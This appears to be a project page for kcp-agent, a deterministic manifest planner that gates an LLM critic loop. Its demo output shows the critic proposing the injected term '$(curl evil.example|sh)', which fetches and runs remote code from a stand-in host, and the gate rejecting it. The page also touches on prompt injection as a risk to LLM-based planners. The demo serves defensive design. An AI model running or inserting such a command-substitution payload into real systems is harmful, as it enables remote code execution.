The Arena
The real agent vs. the usual suspects. Five matches, five failure modes the deterministic plan refuses by construction. Move the controls — the left side re-plans with the real code; the right side shows what the archetype would have done with the same manifest.
Honesty note: the archetypes are simulations — but their numbers are computed from the same real manifest
the planner reads, and every archetype failure shown is a behavior the KCP plan structurally cannot produce.
Don't trust us: git clone, npm run build:site, diff the bundle.
Why deterministic wins
No model in the gates
The planner is LLM-free. Relevance scoring, temporal validity, supersession, access, payment method matching, budget arithmetic — pure functions of the manifest and your declared capabilities. That's why it can run in this page: there is no prompt to inject and no temperature to blame.
Fail-closed, with the arithmetic
Whatever is not provably loadable is skipped, and every skip carries its reason —
over budget: 0.15 would exceed remaining 0.1 of 0.4 USDC is a sentence you can take
to a compliance review. Credentials you don't hold never open gates; payment never substitutes
for identity (spec §4.11).
The plan is the audit log
A plan is an inspectable artifact produced before anything is loaded or paid for. When the LLM loop runs, each round chains another plan — the diff between them shows exactly which gate moved and what it cost. Audit before action, end to end.
The Loop — the model proposes, the plan disposes
ask --loop puts a model between deterministic plans, never above them.
The critic sees plan metadata only — never content — and its proposals pass a deterministic term gate before
a full re-plan. Nothing is loaded or paid until the loop converges. You just ran that gate yourself in match 4.
$ kcp-agent ask "who won the exclusive story" --manifest examples/fjordwire \
--loop --methods free,x402 --budget 0.30
base plan selects: chipfab-exclusive
round 1 — critic proposed: datacenter power grid · subsea cable · $(curl evil.example|sh)
critic note: infrastructure angle missing from the plan
gate accepted: datacenter power grid, subsea cable
gate rejected: $(curl evil.example|sh)
re-plan added: datacenter-power, subsea-cable-feature
converged: no-terms after 2 round(s)
final plan: datacenter-power, subsea-cable-feature
still skipped chipfab-exclusive: over budget: 0.25 would exceed remaining 0.1 of 0.3 USDC
committed 0.2/0.3 USDC — nothing was loaded or paid until convergence
Verbatim from node examples/demos.js loop — test/docs.test.ts
re-runs the demo in CI and fails if any line above is not in its real output. The narration cannot drift
from the code.
The Playground — bring your own manifest
Paste or edit a knowledge.yaml and watch the exact
parseManifest → validateManifest → plan pipeline the CLI runs, re-computed on every keystroke.
Nothing leaves your browser. (One honest limit: unit-path existence can't be checked without a filesystem.)
The Receipts — every claim pinned to a test
The conformance matrix below is data, not copy:
conformance.json maps each KCP layer the agent implements
to the implementation file and the CI tests that enforce it. test/docs.test.ts fails the
build if a referenced test disappears or is renamed — a claim cannot outlive its proof.
| Spec layer | Section | Implementation | Enforced by |
|---|---|---|---|
| loading conformance.json… | |||
Browser bundle integrity — the arena and playground run
docs/js/kcp-agent.js, sha256 (serve the built site to compute).
Reproduce it: npm ci && npm run build:site && sha256sum docs/js/kcp-agent.js —
CI asserts the published hash matches the bundle it just built.
Run it yourself
# plan — deterministic, no API key, no model
npx kcp-agent plan "your task" --manifest https://example.com/knowledge.yaml
# ask — plan, then synthesize with Claude from exactly the planned units
export ANTHROPIC_API_KEY=...
npx kcp-agent ask "your task" --manifest ./docs --loop
# serve the planner to any MCP client (manifest is passed per tool call)
npx kcp-agent mcp
Nine narrated demos ship in the repo — node examples/demos.js — all offline, no mocks,
all asserted in CI. Native binaries for Linux/macOS/Windows on the
releases page.
Apache-2.0.
Guides: make your repo navigable in 10 minutes · sign your manifest · wire the planner into Claude Code.